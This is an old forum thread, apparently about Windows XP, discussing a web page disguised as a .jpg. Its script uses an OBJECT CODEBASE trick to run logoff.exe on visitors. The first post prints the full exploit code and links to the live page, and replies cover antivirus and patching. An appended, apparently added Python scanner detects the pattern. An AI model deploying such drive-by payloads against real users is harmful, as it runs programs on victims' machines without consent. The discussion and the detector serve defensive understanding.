XP very vulnerable for scripts..


ScIveRXP

Guest
Hello - well I found out lately that it's really easy to make an XP PC log out - I was directed to a webpage with a .jpg - I thought what could go wrong..

well the .jpg had this as the content :
Code:
<HTML>
	<HEAD>
		<SCRIPT language=JScript>
			var programName=new Array(
				'c:/windows/system32/logoff.exe',
				'c:/winxp/system32/logoff.exe',
				'c:/winnt/system32/logoff.exe'
			);

			function Init(){
				var oPopup=window.createPopup();
				var oPopBody=oPopup.document.body;
				var n,html='';
				for(n=0;n<programName.length;n++)
				html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
				oPopBody.innerHTML=html;
				oPopup.show(290, 390, 200, 200, document.body);
			}
		</SCRIPT>
	</HEAD>
	<BODY onload="Init()">
	You should feel lucky if you dont have XP right now.
	</BODY>
</HTML>

So I saw something and before I knew my XP logged me off.. I asked the maker of this script and he said it was even possible to add users to a system..

If you haven't got XP installed in a standard dir like stated above then you are safe - but else it's very easy to do harm to XP users...

WOW !!

Don't believe me !? http://www.phphq.nl/xp.jpg (save your work before clicking on this link !!)
 

MaDCeLL

Guest
*ouch* that hurts...

thx a million 4 da info *scriptingdeactivated*
 

WebDome

Guest
Just visited this page, so he is using a JS exploit, easily detectable by AV software. If you are using AV, update your Windows XP with critical updates and you are out of trouble. By the way, I am running Win XP Pro and it couldn't shut me down.
 

Shamus MacNoob

OSNN Veteran Addict
Political Access
Joined
8 Jan 2002
Messages
4,199
Well I am on XP Pro as well and I needed to set active scripting off in IE because that exploit was not detected by NAV2002 and all my security patches are up to date at microshot ......and I would be logged off ...... now I am ok but still something's not right, NAV2002 should not let that happen?? ..........
 

WebDome

Guest
Neither Norton nor McAfee is a good choice of AV. Try Kaspersky (known as KAV), or NOD32 (ESET Antivirus).
 

Raven76

Guest
Hmmm...my installation is on the D:\ drive so I'm unaffected. That could be a nasty trick if it got you at a bad time.
 

dickow

Guest
I have Norton 2002 installed with scripting protection on, tried the web site, and it didn't shut me down on my XP system, so something is working ok.
 

Twink

Guest
heh, boy am I glad I f*cked my install, I got c:\windows.0\ so it don't affect me =D
 

Gnu

OSNN Addict
Joined
20 Jun 2004
Messages
129
That's actually pretty shoddy programming ... you can call windir in just about any API.
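
A defensive check for the pattern in the script posted at the top of this thread, as an added example (not written by any poster here): it flags a response named like an image whose bytes are really markup, and an OBJECT/CODEBASE string together with local executable paths on any drive or directory, since the tag is assembled at runtime and the install location varies. The function name `scan`, the regexes and the sample bytes are constructed for illustration.

```python
import re

# Magic numbers for the image types a file name might claim to be.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
MARKUP = re.compile(rb"<\s*(html|script|body|object)\b", re.I)
# Matched on raw bytes because the tag sits inside a script string literal,
# where an HTML parser would never see it as an element.
OBJECT_CODEBASE = re.compile(rb"<\s*object\b[^>]*\bcodebase\s*=", re.I)
# Any drive letter and any directory, so non-default install paths still match.
LOCAL_EXE = re.compile(
    rb"(?<![a-z0-9])[a-z]:[\\/][^'\"<>\r\n]*\.(?:exe|com|bat|cmd|scr)\b", re.I
)

# Constructed sample: HTML served under an image name, shaped like the post.
SAMPLE = (
    b"<HTML><SCRIPT language=JScript>var p='d:/winxp/system32/logoff.exe';"
    b"html+=\"<OBJECT CLASSID='CLSID:11111111-1111-1111-1111-111111111111' "
    b"CODEBASE='\"+p+\"'></OBJECT>\";</SCRIPT></HTML>"
)


def scan(name: str, body: bytes) -> list[str]:
    """Return the reasons a downloaded response body looks suspicious."""
    findings = []
    ext = name[name.rfind("."):].lower() if "." in name else ""
    magics = IMAGE_MAGIC.get(ext)
    if magics and not body.startswith(magics):
        findings.append("extension/content mismatch")
        if MARKUP.search(body[:4096]):
            findings.append("markup in image-named file")
    if OBJECT_CODEBASE.search(body):
        findings.append("OBJECT with CODEBASE")
        paths = sorted({m.group(0).decode("latin-1") for m in LOCAL_EXE.finditer(body)})
        findings += [f"local executable path: {p}" for p in paths]
    return findings


if __name__ == "__main__":
    for reason in scan("xp.jpg", SAMPLE):
        print(reason)
```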
 
